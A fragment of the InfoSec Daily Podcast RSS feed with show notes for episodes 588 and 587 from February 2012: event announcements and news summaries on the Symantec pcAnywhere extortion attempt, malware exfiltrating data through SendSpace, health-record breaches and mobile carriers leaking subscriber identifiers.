<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.pcmag.com/article2/0,2817,2399912,00.asp"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.pcmag.com/article2/0,2817,2399912,00.asp</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://news.cnet.com/8301-1009_3-57372308-83/hackers-wanted-$50000-to-keep-symantec-source-code-private/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-1009_3-57372308-83/hackers-wanted-$50000-to-keep-symantec-source-code-private/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Members of the Anonymous network released an email thread on Monday that claims that Symantec offered $50,000 in return for the guaranteed destruction of code tied to its pcAnywhere and Norton Antivirus tools.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But the deal fell through, according to the AnonymousIRC account, and the code will be released for free to the Internet at large, the group said.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Update regarding Symantec: Stay tuned for the fucking lulz,&quot; added &quot;TheRealSabu, another member of the Anonymous collective. &quot;Let&#39;s just say Symantec tried to give us 50,000 reasons not to release sources!&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The group said later that the code would be released. Separately, Anonymous released emails from the legal team who represented Frank Wuterich, the staff sergeant who led an assault on the Iraqi city of Haditha that left 24 unarmed civilians dead.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to the email chain, Sam Thomas, an employee of Symantec, began negotiations with &quot;Yamatough,&quot; apparently an Anonymous hacker using a Venezuelan email address, on or about Jan. 18. According to the emails, Symantec asked Yamatough and the Anonymous group to lie about having accomplished an earlier 2006 hack, which obtained the code.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Symantec said it knew of the postings.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;In January, an individual claiming to be part of the &#39;Anonymous&#39; group attempted to extort a payment from Symantec in exchange for not publicly posting stolen Symantec source code they claimed to have in their possession,&quot; a company representative said in an email on Monday night. &quot;Symantec conducted an internal investigation into this incident and also contacted law enforcement given the attempted extortion and apparent theft of intellectual property. The communications with the person(s) attempting to extort the payment from Symantec were part of the law enforcement investigation. Given that the investigation is still ongoing, we are not going to disclose the law enforcement agencies involved and have no additional information to provide.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">No &quot;Sam Thomas&quot; could be found on LinkedIn as a Symantec employee, and emails to the account went unreturned but did not bounce.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="https://twitter.com/#%21/AnonymousIRC/status/166744502315388930"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://twitter.com/#!/AnonymousIRC/status/166744502315388930</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous activists have released source code for PCAnywhere onto the internet, hours after a hacker&#39;s negotiations for payment from Symantec broke down.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The code was posted on the Pirate Bay file-sharing website on Tuesday at around 5:40am, and the BitTorrent link was included in a post to the AnonymousIRC Twitter account, which has been used to publicise the activist group&#39;s claims in the past.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Symantec has been lying to its customers. We exposed this point thus spreading the world that ppl need&quot; &#8211; #AntiSec #Anonymous Spread and share!&quot; said a statement accompanying the download link on Pirate Bay.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<a href="http://news.techworld.com/security/3335275/malware-hijacks-file-host-sendspace-steal-information/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.techworld.com/security/3335275/malware-hijacks-file-host-sendspace-steal-information/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Trend Micro researchers have discovered a piece of malicious software that automatically uploads its stolen data cache to the SendSpace file-sharing service for retrieval.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Malware authors have used file-hosting and sharing servers for that purpose before, but this is the first time malware has been noticed to do that automatically, wrote Roland Dela Paz, a threat response engineer with Trend Micro.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SendSpace accepts files and then generates a link that can be shared with other people to download the content in the files. The malware has been configured to send files, copy the download link and send it to a command-and-control server along with the password needed to access the archive, Dela Paz wrote.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It appears SendSpace&#39;s terms of service would prohibit use of the site that way. SendSpace said in response to an email that it was &quot;notified of this several days ago by Trend Micro themselves, and we&#39;re working to find a solution for this.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">File storage services offer several advantages for cybercriminals, said Rik Ferguson, director of security research and communication for Trend Micro in Europe.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Although the cybercriminals often use networks of proxy computers to mask how they are communicating with a compromised computer, using a storage service adds another layer, Ferguson said. &quot;It breaks in some ways the chain of evidence,&quot; he said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.infosecurity-us.com/view/23648/number-of-patient-record-data-breaches-nearly-doubled-last-year/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.infosecurity-us.com/view/23648/number-of-patient-record-data-breaches-nearly-doubled-last-year/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The total number of patient records compromised in the US increased by 97% in 2011 compared with 2010, according to a report released this week by the Redspin consulting firm.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Redspin cites the increasing concentration of protected health information (PHI) on unencrypted portable devices and the lack of sufficient oversight of PHI disclosed to hospital&rsquo;s business associates as the main reasons for the increase.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Malicious attacks (theft, hacking, and insider incidents) continue to cause 60% of all breaches due to the economic value of personal health records sold on the black market and for medical ID theft used to commit Medicare fraud, the report said.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Redspin examined the data breach information on the US Department of Health and Human Services website, x</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;The velocity of breaches are increasing year over year&rdquo;, said Daniel W. Berger, Redspin&#39;s president and chief executive officer. &ldquo;This problem is widespread and increasing&rdquo;, he told </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Infosecurity</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.techrepublic.com/blog/security/why-are-websites-getting-your-mobile-phone-number/7360"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.techrepublic.com/blog/security/why-are-websites-getting-your-mobile-phone-number/7360</span></a><br />
	<a href="http://www.mulliner.org/collin/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Collin Mulliner</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, researcher at Technische Universitaet Berlin, Group for Security in Telecommunications, believes mobile-service providers are injecting personally-discernible information such as MSISDN, IMSI, and IMEI into HTTP traffic being sent to websites.</span><br />
	<img height="273px;" src="https://lh4.googleusercontent.com/GHjP11Xdq8RL1NWP1W1y3cAiI6DJ8EQfH5kdEZoIzIjp84kdPrjR6ww0nyvUeY6tvMwpH3QFAno_Nt0T-gz-9619CV9GrVB0GIABOnawwmvvPULp1aI" width="427px;" /></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It started several years ago when Collin read that mobile phones were leaking private data via HTTP headers &mdash; but the author provided no evidence. That didn&rsquo;t sit well with Collin, so he took it upon himself to prove or disprove the claims. He explains how he became involved.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">During 2008, while working with Mobile Web and Wireless Access Protocol (WAP), I stumbled across a forum where people were discussing the possibility of leaks. Nobody could make up their mind if this was happening or not. So I started investigating.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I host a website where people can download games for the Java 2 Micro Edition platform. It&rsquo;s popular enough that a mobile-gaming website embeds screen shots of my games. So, every time a visitor loads a relevant page at the gaming website, a request is sent to my web server &mdash; providing lots of relevant traffic. All I had to do was add logging to see if the reports of leakage were true.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This resarch was compiled into a paper. The three highlights are:</span></p>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Private data is leaked by mobile operators around the world.</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anybody owning a website accessed from a mobile phone has the ability to collect personal information about the mobile visitor.</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This type of leak hasn&rsquo;t received any attention until now; nobody knew what to look for.</span></li>
</ul>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There are indications that the phone&rsquo;s MSISDN, IMSI, and IMEI are being leaked. And since the MSISDN is directly linked to the person who owns the phone. If the MSISDN is known:</span></p>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It becomes possible to find the owner&rsquo;s name &mdash; not a good thing if the website is malicious.</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It becomes possible to send SMS messages to visitors &mdash; for spamming or malicious reasons.</span></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-588-50k-doh-sendspace-patient-data-mobile-leak-no-crl-for-you/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3475/0/infosec-daily-podcast-episode-588.mp3" length="19015557" type="audio/mpeg" />
		<itunes:duration>0:39:34</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 588 for February 7, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Varun Sharma.
	&#160;
Announcements:
Unsung Heroes
Have you ever stumbled on a tool [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 588 for February 7, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Varun Sharma.
	&#160;
Announcements:
Unsung Heroes
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://www.pcmag.com/article2/0,2817,2399912,00.asp
	Source: http://news.cnet.com/8301-1009_3-57372308-83/hackers-wanted-$50000-to-keep-symantec-source-code-private/
	Members of the Anonymous network released an email thread on Monday that claims that Symantec offered $50,000 in return for the guaranteed destruction of code tied to its pcAnywhere and Norton Antivirus tools.
	But the deal fell through, according to the AnonymousIRC account, and the code will be released for free to the Internet at large, the group said.
	&#34;Update regarding Symantec: Stay tuned for the fucking lulz,&#34; added &#34;TheRealSabu, another member of the Anonymous collective. &#34;Let&#39;s just say Symantec tried to give us 50,000 reasons not to release sources!&#34;
	The group said later that the code would be released. Separately, Anonymous released emails from the legal team who represented Frank Wuterich, the staff sergeant who led an assault on the Iraqi city of Haditha that left 24 unarmed civilians dead.
	According to the email chain, Sam Thomas, an employee of Symantec, began negotiations with &#34;Ya[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 587 &#8211; Kaspersky, BT Junkie, GMR1/2, Size Doesn’t Matter &amp; Chokers</title>
		<link>http://www.isdpodcast.com/episode-587-kaspersky-bt-junkie-gmr12-size-doesnt-matter-chokers</link>
		<comments>http://www.isdpodcast.com/episode-587-kaspersky-bt-junkie-gmr12-size-doesnt-matter-chokers#comments</comments>
		<pubDate>Tue, 07 Feb 2012 02:01:57 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3470</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 587 for February 6, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, and Beau Woods. &#160; Announcements: Unsung Heroes Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 587 for February 6, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, and Beau Woods.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heroes</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
